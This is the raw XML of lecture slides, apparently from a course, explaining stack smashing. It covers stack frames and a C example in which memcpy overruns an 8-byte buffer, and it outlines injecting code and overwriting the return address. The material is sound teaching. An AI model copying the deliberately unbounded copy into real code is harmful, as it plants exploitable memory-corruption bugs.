              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943600" y="5562600"/>
              <a:ext cx="1371600" cy="38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</a:rPr>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="18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rsp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sp>
          <p:nvSpPr>
            <p:cNvPr id="9219" name="Rectangle 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943600" y="4800600"/>
              <a:ext cx="1371600" cy="38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</a:rPr>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="18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rax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sp>
          <p:nvSpPr>
            <p:cNvPr id="9220" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943600" y="5181600"/>
              <a:ext cx="1371600" cy="3810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</a:rPr>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000066"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdx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</a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9253" name="Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7315200" y="4800600"/>
              <a:ext cx="1371600" cy="381000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</a:rPr>
                <a:t>213</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9254" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="2971800"/>
            <a:ext cx="1371600" cy="3810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9255" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="1752600"/>
            <a:ext cx="1371600" cy="12192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7237413" y="1219200"/>
            <a:ext cx="14144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popq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9260" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="3352800"/>
            <a:ext cx="1371600" cy="381000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213</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9261" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1293813" y="1219200"/>
            <a:ext cx="14144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Initially</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9262" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1774825" y="3411538"/>
            <a:ext cx="511175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Top</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9263" name="Text Box 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4668838" y="3775075"/>
            <a:ext cx="51117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Top</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9264" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7796213" y="3775075"/>
            <a:ext cx="51117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Top</a:t>
            </a:r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7315200" y="5181600"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00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213</a:t>
            </a:r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7315200" y="5562600"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66CCFF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0x108</a:t>
            </a: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0" y="3352800"/>
            <a:ext cx="1371600" cy="381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0x100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Stack smashing (buffer overflow)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One of the most prevalent remote security exploits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741363" lvl="1" indent="-2444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2002: 22.5% of security fixes provided by vendors were for buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741363" lvl="1" indent="-2444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2004: All available exploits: 75% were buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741363" lvl="1" indent="-24447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Examples: Morris worm, Code Red worm, SQL Slammer, Witty worm, Blaster worm</a:t>
            </a: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Although not common, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> useful example to teach from</a:t>
            </a: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How does it work?</a:t>
            </a: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How can it be prevented?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" y="334963"/>
            <a:ext cx="8915400" cy="762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Recall function calls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52425" y="1228725"/>
            <a:ext cx="847725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  <a:b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long x = 0;</a:t>
            </a:r>
            <a:b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…</a:t>
            </a:r>
            <a:b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return;</a:t>
            </a:r>
            <a:b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} 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2060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void main() {</a:t>
            </a:r>
            <a:b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function(); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Wingdings" charset="2"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t></a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>What happens here?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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Stack Frame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647825" y="257175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4772025" y="234315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19100" y="819150"/>
            <a:ext cx="13716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+mn-lt"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Higher memory address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90525" y="4933950"/>
            <a:ext cx="12954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+mn-lt"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Lower memory address</a:t>
            </a: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4772025" y="310515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5229225" y="3257550"/>
            <a:ext cx="19812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4772025" y="386715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848225" y="3867150"/>
            <a:ext cx="2667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4772025" y="462915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+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6157" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="4800600"/>
            <a:ext cx="144780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+mn-lt"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>long x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr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3352800" y="4476750"/>
            <a:ext cx="762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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a: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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6159" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4010025" y="4629150"/>
            <a:ext cx="76200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6164" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="714375" y="1873250"/>
            <a:ext cx="19050" cy="3111500"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5724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20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8591550" y="2228850"/>
            <a:ext cx="1588" cy="3352800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AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7362825" y="285750"/>
            <a:ext cx="1371600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39699"/>
              <a:gd name="adj2" fmla="val 161458"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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7" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7362825" y="361950"/>
            <a:ext cx="1524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00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6168" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5842000" y="-10160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9" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5343525" y="31432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6170" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="171450" y="6338888"/>
            <a:ext cx="800735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Calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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function()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6171" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4772025" y="158115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172" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3343275" y="5210175"/>
            <a:ext cx="762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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a: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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6173" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4010025" y="5400675"/>
            <a:ext cx="76200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905000" y="1447800"/>
            <a:ext cx="2286000" cy="2133600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  <a:b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long x = 0;</a:t>
            </a:r>
            <a:b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…</a:t>
            </a:r>
            <a:b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return;</a:t>
            </a:r>
            <a:b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} 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void main() {</a:t>
            </a:r>
            <a:b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function();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" smtClean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Simple program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647825" y="257175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5429250" y="2324100"/>
            <a:ext cx="2438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314950" y="2990850"/>
            <a:ext cx="26289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5334000" y="3914775"/>
            <a:ext cx="2667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x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7178" name="Rectangle 9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Buffer[7]..Buffer[4]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7182" name="AutoShape 13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7184" name="Rectangle 15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….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7185" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="158750" y="1304925"/>
            <a:ext cx="4822825" cy="35108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x = 0;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char buffer[8];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memcpy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(buffer,“abcdefg”,8);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printf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 “%s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%ld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”, buffer, x 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3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Output: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...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7186" name="Rectangle 17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Buffer[3]..Buffer[0]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Simple program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647825" y="257175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429250" y="2324100"/>
            <a:ext cx="2438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314950" y="2990850"/>
            <a:ext cx="26289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5334000" y="3914775"/>
            <a:ext cx="2667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x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty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0x00000000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buffer[7..4]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0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  \0gfe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A50021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Text Box 12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8206" name="AutoShape 13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….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8209" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="158750" y="1304925"/>
            <a:ext cx="4822825" cy="3751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x = 0;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char buffer[8];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memcpy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(buffer,“abcdefg”,8);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printf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 “%s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%ld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”, buffer, x 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3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Output: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abcdefg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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8210" name="Rectangle 17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buffer[3..0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1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dcba</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A50021"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="32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Simple program 2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647825" y="257175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429250" y="2324100"/>
            <a:ext cx="2438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5314950" y="2990850"/>
            <a:ext cx="26289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5334000" y="3914775"/>
            <a:ext cx="2667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x</a:t>
            </a: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Buffer[7]..Buffer[4]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9" name="Text Box 12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9230" name="AutoShape 13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….</a:t>
            </a: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158750" y="1304925"/>
            <a:ext cx="4822825" cy="3751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x = 0;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char buffer[8];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memcpy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(buffer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,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       “abcdefghijk”,12);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printf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 “%s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%ld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”, buffer, x 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3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Output: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...</a:t>
            </a:r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35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Buffer[3]..Buffer[0]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Simple program 2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647825" y="257175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429250" y="2324100"/>
            <a:ext cx="2438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5314950" y="2990850"/>
            <a:ext cx="26289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257800" y="3733800"/>
            <a:ext cx="26670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x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0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0x00000000006b6a69</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A50021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buffer[7..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4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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1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hgfe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A50021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0254" name="AutoShape 13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10256" name="Rectangle 15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….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10257" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="158750" y="1304925"/>
            <a:ext cx="4822825" cy="3751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function(){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long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x = 0;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char buffer[8];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memcpy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(buffer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,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       “abcdefghijk”,12);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printf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( “%s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%ld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”, buffer, x );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3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Output: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  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abcdefghijk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7039593</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10258" name="Rectangle 17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buffer[3..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0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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>dcba</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A50021"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="32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" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1495425"/>
            <a:ext cx="1371600" cy="4524375"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 82465"/>
            </a:avLst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Buffer Overflow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5734050" y="3086100"/>
            <a:ext cx="19812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5353050" y="3695700"/>
            <a:ext cx="2667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Buffer[7]..Buffer[4]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1278" name="AutoShape 13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11280" name="Rectangle 15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174625" y="1287463"/>
            <a:ext cx="4231584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Idea: Trick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the program into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overwriting memory it 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shouldn’t…</a:t>
            </a:r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83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Buffer[3]..Buffer[0]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28600" y="3429000"/>
            <a:ext cx="4699000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What can we do when we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mess up the program’s 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memory?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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Buffer Overflow</a:t>
            </a:r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3317" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6346825" y="-27305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5848350" y="142875"/>
            <a:ext cx="17526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size of a word (e.g.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8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bytes)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342901" y="968375"/>
            <a:ext cx="4686300" cy="42879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500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="8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void 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function(){ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="8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		char buffer[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="8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2060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>		return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="8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  <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>}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Return 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statement in C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1) Cleans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off the function’s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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2) Jump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to return address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Can use this to set the instruction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pointer!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a</a:t>
            </a:r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6" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1038225"/>
            <a:ext cx="1371600" cy="4981575"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 90799"/>
            </a:avLst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5400675" y="3086100"/>
            <a:ext cx="2628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5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latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>New Return addr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5353050" y="3695700"/>
            <a:ext cx="2667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Buffer[7]..Buffer[4]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5381625" y="5457825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   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Buffer[3]..Buffer[0]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648075" y="3359150"/>
            <a:ext cx="1571625" cy="1111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Buffer Overflow</a:t>
            </a:r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 flipH="1">
            <a:off x="8407400" y="1066800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7667625" y="40005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1" y="1143000"/>
            <a:ext cx="5029200" cy="19411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457200" indent="-454025" eaLnBrk="1" hangingPunct="1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Anatomy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of a buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-454025" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="000066"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buAutoNum type="arabicParenR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Inject malicious code into buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-454025" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="000066"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buAutoNum type="arabicParenR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Set the IP to execute it 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by overwriting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return address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5276850" y="2171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5276850" y="2933700"/>
            <a:ext cx="2743200" cy="7620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276850" y="3695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5276850" y="4457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5276850" y="1409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>
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>a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276850" y="5229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8" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="1038225"/>
            <a:ext cx="2581275" cy="4981575"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 48247"/>
            </a:avLst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5400675" y="3086100"/>
            <a:ext cx="2628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5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latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>New Return addr</a:t>
            </a:r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5334000" y="3905250"/>
            <a:ext cx="2667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Malicious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code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5381625" y="4686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Malicious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code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5638800" y="5448300"/>
            <a:ext cx="19812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Malicious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code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14353" name="AutoShape 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="14343" idx="1"/>
            <a:endCxn id="14352" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5276850" y="3314700"/>
            <a:ext cx="361950" cy="2317750"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101520">
            <a:solidFill>
              <a:srgbClr val="FF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Control Flow terminology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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>: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 </a:t>
            </a:r>
            <a:r>
